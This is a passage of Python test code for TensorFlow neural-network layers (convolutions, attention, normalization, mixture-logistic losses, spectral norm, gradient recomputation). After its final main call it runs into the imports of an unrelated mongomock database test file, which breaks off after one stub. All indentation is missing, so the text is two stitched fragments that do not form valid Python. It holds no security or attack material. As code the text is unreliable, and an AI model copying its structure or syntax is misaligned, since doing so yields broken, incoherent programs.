self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (3, 5, 16))
def testShakeShake(self):
x = np.random.rand(5, 7)
with self.test_session() as session:
x = tf.constant(x, dtype=tf.float32)
y = common_layers.shakeshake([x, x, x, x, x])
inp, res = session.run([x, y])
self.assertAllClose(res, inp)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConv(self):
x = np.random.rand(5, 7, 1, 11)
y = common_layers.conv(tf.constant(x, dtype=tf.float32), 13, (3, 1))
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 5, 1, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConv1d(self):
x = np.random.rand(5, 7, 11)
y = common_layers.conv1d(tf.constant(x, dtype=tf.float32), 13, 1)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSeparableConv(self):
x = np.random.rand(5, 7, 1, 11)
y = common_layers.separable_conv(
tf.constant(x, dtype=tf.float32), 13, (3, 1))
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 5, 1, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSubSeparableConv(self):
for sep in [0, 1, 2, 4]:
x = np.random.rand(5, 7, 1, 12)
with tf.variable_scope("sep_%d" % sep):
y = common_layers.subseparable_conv(
tf.constant(x, dtype=tf.float32), 16, (3, 1), separability=sep)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 5, 1, 16))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConvBlock(self):
x = np.random.rand(5, 7, 1, 11)
y = common_layers.conv_block(
tf.constant(x, dtype=tf.float32),
13, [(1, (3, 3)), (1, (3, 3))],
padding="SAME",
normalizer_fn=common_layers.noam_norm)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 1, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSeparableConvBlock(self):
x = np.random.rand(5, 7, 1, 11)
y = common_layers.separable_conv_block(
tf.constant(x, dtype=tf.float32),
13, [(1, (3, 3)), (1, (3, 3))],
padding="SAME")
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 1, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSubSeparableConvBlock(self):
for sep in [0, 1, 2, 4]:
x = np.random.rand(5, 7, 1, 12)
with tf.variable_scope("sep_%d" % sep):
y = common_layers.subseparable_conv_block(
tf.constant(x, dtype=tf.float32),
16, [(1, (3, 3)), (1, (3, 3))],
padding="SAME",
separability=sep)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 1, 16))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testPool(self):
x = np.random.rand(5, 8, 1, 11)
y = common_layers.pool(
tf.constant(x, dtype=tf.float32), (2, 2), "AVG", "SAME")
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 8, 1, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConvBlockDownsample(self):
x = np.random.rand(5, 7, 1, 11)
y = common_layers.conv_block_downsample(
tf.constant(x, dtype=tf.float32), (3, 1), (2, 1), "SAME")
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 4, 1, 27))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSimpleAttention(self):
x = np.random.rand(5, 7, 1, 11)
y = np.random.rand(5, 9, 1, 11)
a = common_layers.simple_attention(
tf.constant(x, dtype=tf.float32), tf.constant(y, dtype=tf.float32))
res = self.evaluate(a)
self.assertEqual(res.shape, (5, 7, 1, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testGetTimingSignal(self):
length = 7
num_timescales = 10
a = common_layers.get_timing_signal(length, num_timescales=num_timescales)
res = self.evaluate(a)
self.assertEqual(res.shape, (length, 2 * num_timescales))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testAddTimingSignal(self):
batch = 5
length = 7
height = 3
depth = 35
x = np.random.rand(batch, length, height, depth)
a = common_layers.add_timing_signal(tf.constant(x, dtype=tf.float32))
res = self.evaluate(a)
self.assertEqual(res.shape, (batch, length, height, depth))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testAttention1D(self):
batch = 5
target_length = 7
source_length = 13
source_depth = 9
target_depth = 11
attention_size = 21
output_size = 15
num_heads = 7
source = np.random.rand(batch, source_length, source_depth)
target = np.random.rand(batch, target_length, target_depth)
mask = np.random.rand(batch, target_length, source_length)
a = common_layers.attention_1d_v0(
tf.constant(source, dtype=tf.float32),
tf.constant(target, dtype=tf.float32), attention_size, output_size,
num_heads, tf.constant(mask, dtype=tf.float32))
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(a)
self.assertEqual(res.shape, (batch, target_length, output_size))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testMultiscaleConvSum(self):
x = np.random.rand(5, 9, 1, 11)
y = common_layers.multiscale_conv_sum(
tf.constant(x, dtype=tf.float32),
13, [((1, 1), (5, 5)), ((2, 2), (3, 3))],
"AVG",
padding="SAME")
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 9, 1, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConvGRU(self):
x = np.random.rand(5, 7, 3, 11)
y = common_layers.conv_gru(tf.constant(x, dtype=tf.float32), (1, 3), 11)
z = common_layers.conv_gru(
tf.constant(x, dtype=tf.float32), (1, 3), 11, padding="LEFT")
self.evaluate(tf.global_variables_initializer())
res1 = self.evaluate(y)
res2 = self.evaluate(z)
self.assertEqual(res1.shape, (5, 7, 3, 11))
self.assertEqual(res2.shape, (5, 7, 3, 11))
def testSRU(self):
x = np.random.rand(5, 7, 3, 11)
with self.test_session() as session:
y = common_layers.sru(tf.constant(x, dtype=tf.float32))
session.run(tf.global_variables_initializer())
res = session.run(y)
self.assertEqual(res.shape, (5, 7, 3, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testLayerNorm(self):
x = np.random.rand(5, 7, 11)
y = common_layers.layer_norm(tf.constant(x, dtype=tf.float32), 11)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testGroupNorm(self):
x = np.random.rand(5, 7, 3, 16)
y = common_layers.group_norm(tf.constant(x, dtype=tf.float32))
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 3, 16))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConvLSTM(self):
x = np.random.rand(5, 7, 11, 13)
y = common_layers.conv_lstm(tf.constant(x, dtype=tf.float32), (1, 3), 13)
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (5, 7, 11, 13))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testPadToSameLength(self):
x1 = np.random.rand(5, 7, 11)
x2 = np.random.rand(5, 9, 11)
a, b = common_layers.pad_to_same_length(
tf.constant(x1, dtype=tf.float32), tf.constant(x2, dtype=tf.float32))
c, d = common_layers.pad_to_same_length(
tf.constant(x1, dtype=tf.float32),
tf.constant(x2, dtype=tf.float32),
final_length_divisible_by=4)
res1, res2 = self.evaluate([a, b])
res1a, res2a = self.evaluate([c, d])
self.assertEqual(res1.shape, (5, 9, 11))
self.assertEqual(res2.shape, (5, 9, 11))
self.assertEqual(res1a.shape, (5, 12, 11))
self.assertEqual(res2a.shape, (5, 12, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testShiftLeft(self):
x1 = np.zeros((5, 7, 1, 11))
x1[:, 0, :] = np.ones_like(x1[:, 0, :])
expected = np.zeros((5, 7, 1, 11))
expected[:, 1, :] = np.ones_like(expected[:, 1, :])
a = common_layers.shift_right(tf.constant(x1, dtype=tf.float32))
actual = self.evaluate(a)
self.assertAllEqual(actual, expected)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testConvStride2MultiStep(self):
x1 = np.random.rand(5, 32, 16, 11)
a = common_layers.conv_stride2_multistep(
tf.constant(x1, dtype=tf.float32), 4, 16)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(a[0])
self.assertEqual(actual.shape, (5, 2, 1, 16))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testDeconvStride2MultiStep(self):
x1 = np.random.rand(5, 2, 1, 11)
a = common_layers.deconv_stride2_multistep(
tf.constant(x1, dtype=tf.float32), 4, 16)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(a)
self.assertEqual(actual.shape, (5, 32, 1, 16))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testApplyNormLayer(self):
x1 = np.random.rand(5, 2, 1, 11)
x2 = common_layers.apply_norm(
tf.constant(x1, dtype=tf.float32), "layer", depth=11, epsilon=1e-6)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(x2)
self.assertEqual(actual.shape, (5, 2, 1, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testApplyNormNoam(self):
x1 = np.random.rand(5, 2, 1, 11)
x2 = common_layers.apply_norm(
tf.constant(x1, dtype=tf.float32), "noam", depth=11, epsilon=1e-6)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(x2)
self.assertEqual(actual.shape, (5, 2, 1, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testApplyNormBatch(self):
x1 = np.random.rand(5, 2, 1, 11)
x2 = common_layers.apply_norm(
tf.constant(x1, dtype=tf.float32), "batch", depth=11, epsilon=1e-6)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(x2)
self.assertEqual(actual.shape, (5, 2, 1, 11))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testApplyNormNone(self):
x1 = np.random.rand(5, 2, 1, 11)
x2 = common_layers.apply_norm(
tf.constant(x1, dtype=tf.float32), "none", depth=11, epsilon=1e-6)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(x2)
self.assertEqual(actual.shape, (5, 2, 1, 11))
self.assertAllClose(actual, x1, atol=1e-03)
def testGlobalPool1d(self):
x1 = np.random.rand(5, 4, 11)
no_mask = np.ones((5, 4))
full_mask = np.zeros((5, 4))
x1_ = tf.Variable(x1, dtype=tf.float32)
no_mask_ = tf.Variable(no_mask, dtype=tf.float32)
full_mask_ = tf.Variable(full_mask, dtype=tf.float32)
none_mask_max = common_layers.global_pool_1d(x1_)
no_mask_max = common_layers.global_pool_1d(x1_, mask=no_mask_)
result1 = tf.reduce_sum(none_mask_max - no_mask_max)
full_mask_max = common_layers.global_pool_1d(x1_, mask=full_mask_)
result2 = tf.reduce_sum(full_mask_max)
none_mask_avr = common_layers.global_pool_1d(x1_, "AVR")
no_mask_avr = common_layers.global_pool_1d(x1_, "AVR", no_mask_)
result3 = tf.reduce_sum(none_mask_avr - no_mask_avr)
full_mask_avr = common_layers.global_pool_1d(x1_, "AVR", full_mask_)
result4 = tf.reduce_sum(full_mask_avr)
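# An all-ones mask must reproduce the unmasked pooling (results 1 and 3
# should be exactly zero), and an all-zeros mask is expected to zero the
# max-pooled output (result 2); result4 is evaluated but left unasserted.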
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate([result1, result2, result3, result4])
self.assertAllEqual(actual[:3], [0.0, 0.0, 0.0])
def testLinearSetLayer(self):
x1 = np.random.rand(5, 4, 11)
cont = np.random.rand(5, 13)
x1_ = tf.Variable(x1, dtype=tf.float32)
cont_ = tf.Variable(cont, dtype=tf.float32)
simple_ff = common_layers.linear_set_layer(32, x1_)
cont_ff = common_layers.linear_set_layer(32, x1_, context=cont_)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate([simple_ff, cont_ff])
self.assertEqual(actual[0].shape, (5, 4, 32))
self.assertEqual(actual[1].shape, (5, 4, 32))
def testRavanbakhshSetLayer(self):
x1 = np.random.rand(5, 4, 11)
x1_ = tf.Variable(x1, dtype=tf.float32)
layer = common_layers.ravanbakhsh_set_layer(32, x1_)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(layer)
self.assertEqual(actual.shape, (5, 4, 32))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testBReLU(self):
x = np.random.rand(5, 2, 1, 12)
y = common_layers.brelu(tf.constant(x, dtype=tf.float32))
actual = self.evaluate(y)
self.assertEqual(actual.shape, (5, 2, 1, 12))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testBELU(self):
x = np.random.rand(5, 2, 1, 12)
y = common_layers.belu(tf.constant(x, dtype=tf.float32))
actual = self.evaluate(y)
self.assertEqual(actual.shape, (5, 2, 1, 12))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testNAC(self):
x = np.random.rand(5, 2, 1, 12)
y = common_layers.nac(tf.constant(x, dtype=tf.float32), 14)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(y)
self.assertEqual(actual.shape, (5, 2, 1, 14))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testNALU(self):
x = np.random.rand(5, 2, 1, 12)
y = common_layers.nalu(tf.constant(x, dtype=tf.float32), 14)
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(y)
self.assertEqual(actual.shape, (5, 2, 1, 14))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testNALUzeros(self):
x = np.random.rand(5, 2, 1, 12)
y = common_layers.nalu(tf.zeros_like(x, dtype=tf.float32), 14)
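# NALU's multiplicative path works in log space (roughly
# exp(W . log(|x| + eps))), so an all-zero input is the numerical edge
# case this test guards against: the outputs must stay finite.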
self.evaluate(tf.global_variables_initializer())
actual = self.evaluate(y)
self.assertTrue(np.all(np.isfinite(actual)))
self.assertEqual(actual.shape, (5, 2, 1, 14))
def testPaddingCrossEntropyFactored(self):
vocab_size = 19
rows = 5
cols = 4
depth = 11
label_smoothing = 0.1
features = np.random.rand(rows, cols, depth)
weights = np.random.rand(vocab_size, depth)
labels = np.random.randint(0, vocab_size - 1, size=(rows, cols))
with self.test_session() as session:
features = tf.to_float(features)
weights = tf.to_float(weights)
labels = tf.to_int32(labels)
logits = tf.matmul(
tf.reshape(features, [rows * cols, depth]), weights, transpose_b=True)
logits = tf.reshape(logits, [rows, cols, vocab_size])
loss_num, loss_den = common_layers.padded_cross_entropy(
logits, labels, label_smoothing=label_smoothing, reduce_sum=False)
factored_logits = common_layers.FactoredTensor(features, weights)
loss_num_f, loss_den_f = common_layers.padded_cross_entropy_factored(
factored_logits,
labels=labels,
label_smoothing=label_smoothing,
reduce_sum=False)
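# padded_cross_entropy returns a (numerator, denominator) pair whose ratio
# is the mean loss; the factored variant is meant to compute the same
# values from (features, weights) without materializing the full
# [rows * cols, vocab_size] logits, so both pairs should match.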
num, den, num_f, den_f = session.run(
[loss_num, loss_den, loss_num_f, loss_den_f])
self.assertEqual(num.shape, (rows, cols))
self.assertEqual(den.shape, (rows, cols))
self.assertEqual(num_f.shape, (rows, cols))
self.assertEqual(den_f.shape, (rows, cols))
self.assertAllClose(num, num_f)
self.assertAllClose(den, den_f)
def testPaddingCrossEntropyFactoredGrad(self):
vocab_size = 19
rows = 5
cols = 4
depth = 11
label_smoothing = 0.1
features = np.random.rand(rows, cols, depth)
weights = np.random.rand(vocab_size, depth)
labels = np.random.randint(0, vocab_size - 1, size=(rows, cols))
with self.test_session() as session:
features = tf.to_float(features)
weights = tf.to_float(weights)
labels = tf.to_int32(labels)
logits = tf.matmul(
tf.reshape(features, [rows * cols, depth]), weights, transpose_b=True)
logits = tf.reshape(logits, [rows, cols, vocab_size])
loss_num, loss_den = common_layers.padded_cross_entropy(
logits, labels, label_smoothing=label_smoothing, reduce_sum=False)
factored_logits = common_layers.FactoredTensor(features, weights)
loss_num_factored, loss_den_factored = (
common_layers.padded_cross_entropy_factored(
factored_logits,
labels=labels,
label_smoothing=label_smoothing,
reduce_sum=False))
df, dw = tf.gradients(ys=[loss_num, loss_den], xs=[features, weights])
df_factored, dw_factored = tf.gradients(
ys=[loss_num_factored, loss_den_factored], xs=[features, weights])
actual_df, actual_dw, actual_df_factored, actual_dw_factored = (
session.run([df, dw, df_factored, dw_factored]))
self.assertEqual(actual_df.shape, (rows, cols, depth))
self.assertEqual(actual_dw.shape, (vocab_size, depth))
self.assertEqual(actual_df_factored.shape, (rows, cols, depth))
self.assertEqual(actual_dw_factored.shape, (vocab_size, depth))
self.assertAllClose(actual_df, actual_df_factored)
self.assertAllClose(actual_dw, actual_dw_factored)
@parameterized.parameters(
(2, 4, 4, 5, True),
(2, 4, 4, 5, False),
(1, 16, 16, 1, True),
(1, 16, 16, 1, False),
)
def testDmlLoss(self, batch, height, width, num_mixtures, reduce_sum):
channels = 3
pred = tf.random_normal([batch, height, width, num_mixtures * 10])
labels = tf.random_uniform([batch, height, width, channels],
minval=0, maxval=256, dtype=tf.int32)
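# Each mixture component uses 10 channels: 1 mixture logit plus 3 means,
# 3 log-scales and 3 RGB coefficients (see the pred construction in
# testDiscretizedMixLogisticLoss below), hence num_mixtures * 10.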
actual_loss_num, actual_loss_den = common_layers.dml_loss(
pred=pred, labels=labels, reduce_sum=reduce_sum)
actual_loss = actual_loss_num / actual_loss_den
real_labels = common_layers.convert_rgb_to_symmetric_real(labels)
expected_loss = common_layers.discretized_mix_logistic_loss(
pred=pred, labels=real_labels) / channels
if reduce_sum:
expected_loss = tf.reduce_mean(expected_loss)
actual_loss_val, expected_loss_val = self.evaluate(
[actual_loss, expected_loss])
self.assertAllClose(actual_loss_val, expected_loss_val)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testDiscretizedMixLogisticLoss(self):
batch = 2
height = 4
width = 4
channels = 3
num_mixtures = 5
logits = tf.concat( # assign all probability mass to first component
[tf.ones([batch, height, width, 1]) * 1e8,
tf.zeros([batch, height, width, num_mixtures - 1])],
axis=-1)
locs = tf.random_uniform([batch, height, width, num_mixtures * 3],
minval=-.9, maxval=.9)
log_scales = tf.random_uniform([batch, height, width, num_mixtures * 3],
minval=-1., maxval=1.)
coeffs = tf.atanh(tf.zeros([batch, height, width, num_mixtures * 3]))
pred = tf.concat([logits, locs, log_scales, coeffs], axis=-1)
# Test labels that don't satisfy edge cases where 8-bit value is 0 or 255.
labels = tf.random_uniform([batch, height, width, channels],
minval=-.9, maxval=.9)
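# Hand-computed expected loss: with all mixture mass on component 0 and
# zero coefficients, the likelihood of a label is the logistic CDF mass of
# the bin [label - 1/255, label + 1/255], i.e. sigmoid(plus_in) -
# sigmoid(min_in); the loss is minus the log of that mass, summed over
# channels.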
locs_0 = locs[..., :3]
log_scales_0 = log_scales[..., :3]
centered_labels = labels - locs_0
inv_stdv = tf.exp(-log_scales_0)
plus_in = inv_stdv * (centered_labels + 1. / 255.)
min_in = inv_stdv * (centered_labels - 1. / 255.)
cdf_plus = tf.nn.sigmoid(plus_in)
cdf_min = tf.nn.sigmoid(min_in)
expected_loss = -tf.reduce_sum(tf.log(cdf_plus - cdf_min), axis=-1)
actual_loss = common_layers.discretized_mix_logistic_loss(
pred=pred, labels=labels)
actual_loss_val, expected_loss_val = self.evaluate(
[actual_loss, expected_loss])
self.assertAllClose(actual_loss_val, expected_loss_val, rtol=1e-5)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSampleFromDiscretizedMixLogistic(self):
batch = 2
height = 4
width = 4
num_mixtures = 5
seed = 42
logits = tf.concat( # assign all probability mass to first component
[tf.ones([batch, height, width, 1]) * 1e8,
tf.zeros([batch, height, width, num_mixtures - 1])],
axis=-1)
locs = tf.random_uniform([batch, height, width, num_mixtures * 3],
minval=-.9, maxval=.9)
log_scales = tf.ones([batch, height, width, num_mixtures * 3]) * -1e8
coeffs = tf.atanh(tf.zeros([batch, height, width, num_mixtures * 3]))
pred = tf.concat([logits, locs, log_scales, coeffs], axis=-1)
locs_0 = locs[..., :3]
expected_sample = tf.clip_by_value(locs_0, -1., 1.)
actual_sample = common_layers.sample_from_discretized_mix_logistic(
pred, seed=seed)
actual_sample_val, expected_sample_val = self.evaluate(
[actual_sample, expected_sample])
# Use a low tolerance: samples numerically differ, as the actual
# implementation clips log-scales so they always contribute to sampling.
self.assertAllClose(actual_sample_val, expected_sample_val, atol=1e-2)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testFactoredTensorImplicitConversion(self):
a = np.random.rand(3, 4, 5)
b = np.random.rand(6, 5)
c = np.random.rand(3, 4, 6)
# a factored representation of a Tensor of shape (3, 4, 6)
factored = common_layers.FactoredTensor(tf.to_float(a), tf.to_float(b))
# implicitly converts factored to a Tensor (performing the matmul)
d = factored + tf.to_float(c)
out = self.evaluate(d)
self.assertEqual(out.shape, (3, 4, 6))
def testConvHiddenReluMemoryEfficient(self):
batch = 3
length = 23
io_size = 16
filter_size = 7
x = np.random.rand(batch, length, io_size)
dy = np.random.rand(batch, length, io_size)
with self.test_session() as session:
x = tf.to_float(x)
dy = tf.to_float(dy)
f1 = tf.get_variable("f1", [1, io_size, filter_size])
f2 = tf.get_variable("f2", [1, filter_size, io_size])
norm_scale, norm_bias = common_layers.layer_norm_vars(io_size)
y = common_layers.conv_hidden_relu_memory_efficient(
x, filter_size, forget=False,
test_vars=(f1, f2, norm_scale, norm_bias))
y_forget = common_layers.conv_hidden_relu_memory_efficient(
x, filter_size, forget=True,
test_vars=(f1, f2, norm_scale, norm_bias))
dx, df1, df2, dnorm_scale, dnorm_bias = tf.gradients(
ys=[y], xs=[x, f1, f2, norm_scale, norm_bias], grad_ys=[dy])
dx_f, df1_f, df2_f, dnorm_scale_f, dnorm_bias_f = tf.gradients(
ys=[y_forget], xs=[x, f1, f2, norm_scale, norm_bias], grad_ys=[dy])
session.run(tf.global_variables_initializer())
(y, y_forget,
dx, df1, df2, dnorm_scale, dnorm_bias,
dx_f, df1_f, df2_f, dnorm_scale_f, dnorm_bias_f) = session.run(
[y, y_forget,
dx, df1, df2, dnorm_scale, dnorm_bias,
dx_f, df1_f, df2_f, dnorm_scale_f, dnorm_bias_f])
self.assertAllClose(y, y_forget)
self.assertAllClose(df2, df2_f)
self.assertAllClose(df1, df1_f)
self.assertAllClose(dnorm_scale, dnorm_scale_f)
self.assertAllClose(dnorm_bias, dnorm_bias_f)
self.assertAllClose(dx, dx_f)
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testCycleGANUpsampleNnUpsampleConv(self):
batch = 8
height = 32
width = 32
num_channels = 3
output_filters = 10
stride = [2, 3] # we want height to be x2 and width to be x3
random_input = np.random.rand(batch, height, width, num_channels).astype(
np.float32)
# nn_upsample_conv gives exactly the shapes we'd expect.
upsampled_output = common_layers.cyclegan_upsample(
random_input, output_filters, stride, "nn_upsample_conv")
upsampled_output_shape = tf.shape(upsampled_output)
self.evaluate(tf.global_variables_initializer())
self.assertAllEqual(
[batch, height * stride[0], width * stride[1], output_filters],
self.evaluate(upsampled_output_shape))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testCycleGANUpsampleBilinearUpsampleConv(self):
batch = 8
height = 32
width = 32
num_channels = 3
output_filters = 10
stride = [2, 3] # we want height to be x2 and width to be x3
random_input = np.random.rand(batch, height, width, num_channels).astype(
np.float32)
# bilinear_upsample_conv gives exactly the shapes we'd expect.
upsampled_output = common_layers.cyclegan_upsample(
random_input, output_filters, stride, "bilinear_upsample_conv")
upsampled_output_shape = tf.shape(upsampled_output)
self.evaluate(tf.global_variables_initializer())
self.assertAllEqual(
[batch, height * stride[0], width * stride[1], output_filters],
self.evaluate(upsampled_output_shape))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testCycleGANUpsampleConv2dTranspose(self):
batch = 8
height = 32
width = 32
num_channels = 3
output_filters = 10
stride = [2, 3] # we want height to be x2 and width to be x3
random_input = np.random.rand(batch, height, width, num_channels).astype(
np.float32)
# conv2d_transpose is a little tricky.
# height_new = (height_old - 1) * stride + kernel - 2*padding - correction
# here kernel = 3, padding = 0, correction = 1
upsampled_height = (height - 1) * stride[0] + 3 - 2*0 - 1
upsampled_width = (width - 1) * stride[1] + 3 - 2*0 - 1
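# e.g. with height = width = 32: (32 - 1) * 2 + 3 - 0 - 1 = 64 and
# (32 - 1) * 3 + 3 - 0 - 1 = 95.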
upsampled_output = common_layers.cyclegan_upsample(random_input,
output_filters, stride,
"conv2d_transpose")
upsampled_output_shape = tf.shape(upsampled_output)
self.evaluate(tf.global_variables_initializer())
self.assertAllEqual(
[batch, upsampled_height, upsampled_width, output_filters],
self.evaluate(upsampled_output_shape))
def testSpectralNorm(self):
# Test that after 20 calls to apply_spectral_norm, the spectral
# norm of the normalized matrix is close to 1.0
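# (The spectral norm is the largest singular value, hence the check on
# s[0] below; each run of assign_op appears to advance a power-iteration
# estimate of that value.)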
with tf.Graph().as_default():
weights = tf.get_variable("w", dtype=tf.float32, shape=[2, 3, 50, 100])
weights = tf.multiply(weights, 10.0)
normed_weight, assign_op = common_layers.apply_spectral_norm(weights)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for _ in range(20):
sess.run(assign_op)
normed_weight, assign_op = common_layers.apply_spectral_norm(
weights)
normed_weight = sess.run(normed_weight).reshape(-1, 100)
_, s, _ = np.linalg.svd(normed_weight)
self.assertTrue(np.allclose(s[0], 1.0, rtol=0.1))
class FnWithCustomGradTest(tf.test.TestCase):
def testCorrectness(self):
w = tf.random_uniform([6, 10])
def fn(a, b, c):
return tf.layers.dense(
a,
10,
use_bias=False,
kernel_initializer=lambda shape, dtype, partition_info: w
) + tf.matmul(b, c)
def grad_fn(inputs, variables, outputs, grad_outputs):
outputs = outputs[0]
grad_outputs = grad_outputs[0]
grad_inputs = tf.gradients(outputs, inputs, grad_ys=grad_outputs)
grad_vars = tf.gradients(outputs, variables, grad_ys=grad_outputs)
return grad_inputs, grad_vars
custom_fn = common_layers.fn_with_custom_grad(grad_fn)(fn)
a = tf.random_uniform([11, 6])
b = tf.random_uniform([11, 7])
c = tf.random_uniform([7, 10])
out = fn(a, b, c)
custom_out = custom_fn(a, b, c)
self.assertEqual(out.get_shape().as_list(),
custom_out.get_shape().as_list())
loss = tf.reduce_mean(out)
custom_loss = tf.reduce_mean(custom_out)
grads = tf.gradients(loss, [a, b, c] + [tf.trainable_variables()[0]])
custom_grads = tf.gradients(custom_loss,
[a, b, c] + [tf.trainable_variables()[1]])
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
out_val, custom_out_val, grads_val, custom_grads_val = sess.run(
[out, custom_out, grads, custom_grads])
self.assertAllClose(out_val, custom_out_val)
for g1, g2 in zip(grads_val, custom_grads_val):
self.assertAllClose(g1, g2)
def testCustomGrad(self):
def fn(a, b, c):
return tf.layers.dense(a, 10, use_bias=False) + tf.matmul(b, c)
def grad_fn(inputs, variables, unused_outputs, unused_grad_outputs):
grad_inputs = [tf.ones_like(t) * (i + 1.) for i, t in enumerate(inputs)]
grad_vars = [
tf.ones_like(t) * (i + len(inputs) + 1.)
for i, t in enumerate(variables)
]
return grad_inputs, grad_vars
a = tf.random_uniform([11, 6])
b = tf.random_uniform([11, 7])
c = tf.random_uniform([7, 10])
w = tf.random_uniform([6, 10])
out = common_layers.fn_with_custom_grad(grad_fn)(fn)(a, b, c)
loss = tf.reduce_mean(out)
grads = tf.gradients(loss, [a, b, c, tf.trainable_variables()[0]])
expected_grads = [
tf.ones_like(t) * (i + 1.) for i, t in enumerate([a, b, c, w])
]
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
g_val, eg_val = sess.run([grads, expected_grads])
for g1, g2 in zip(g_val, eg_val):
self.assertAllClose(g1, g2)
class RecomputeTest(tf.test.TestCase):
def testRecompute(self):
def layer(x, name=None):
with tf.variable_scope(name, default_name="layer"):
x = tf.contrib.layers.layer_norm(x)
x = tf.layers.conv1d(
x,
10,
1,
use_bias=False,
kernel_initializer=tf.constant_initializer(42.42))
x = tf.nn.relu(x)
return x
def fn(x):
out = x
for _ in range(3):
out = layer(out)
return out
@common_layers.recompute_grad
def fn_recompute(x):
return fn(x)
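# recompute_grad discards intermediate activations on the forward pass and
# recomputes them during backprop, trading compute for memory; the outputs
# and gradients should nevertheless match the regular path exactly, which
# is what the assertions below verify.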
x = tf.random_uniform((3, 1, 3))
recompute_vars = None
with tf.variable_scope("recompute") as vs:
out1 = tf.reduce_sum(fn_recompute(x))
recompute_vars = vs.trainable_variables()
reg_vars = None
with tf.variable_scope("regular") as vs:
out2 = tf.reduce_sum(fn(x))
reg_vars = vs.trainable_variables()
grad1 = tf.gradients(out1, recompute_vars)
grad2 = tf.gradients(out2, reg_vars)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
outs = sess.run([out1, out2, grad1, grad2])
self.assertAllClose(outs[0], outs[1])
for g1, g2 in zip(outs[2], outs[3]):
self.assertAllClose(g1, g2)
if __name__ == "__main__":
tf.test.main()
import copy
import time
import itertools
import re
import platform
import sys
from .utils import TestCase, skipIf, DBRef
import mongomock
from mongomock import Database
try:
import pymongo
from pymongo import Connection as PymongoConnection
from pymongo import MongoClient as PymongoClient
from bson.objectid import ObjectId
_HAVE_PYMONGO = True
except ImportError:
from mongomock.object_id import ObjectId
_HAVE_PYMONGO = False
try:
import execjs
from bson.code import Code
from bson.son import SON
_HAVE_MAP_REDUCE = True
except ImportError:
_HAVE_MAP_REDUCE = False
from tests.multicollection import MultiCollection
class InterfaceTest(TestCase):
def test__can_create_db_without_path(self):
conn = mongomock.Connection()
